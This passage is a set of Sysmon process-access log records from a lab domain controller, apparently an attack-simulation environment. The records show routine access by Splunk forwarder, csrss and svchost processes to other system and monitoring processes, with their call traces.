{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2716,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FB7-5F25-0000-00108DDD0400}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FB7-5F25-0000-00108DDD0400}","TargetProcessId":"4200","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2717,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FB7-5F25-0000-00108DDD0400}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FB7-5F25-0000-00108DDD0400}","TargetProcessId":"4200","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2718,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2719,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2720,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2721,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2722,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2723,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2724,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 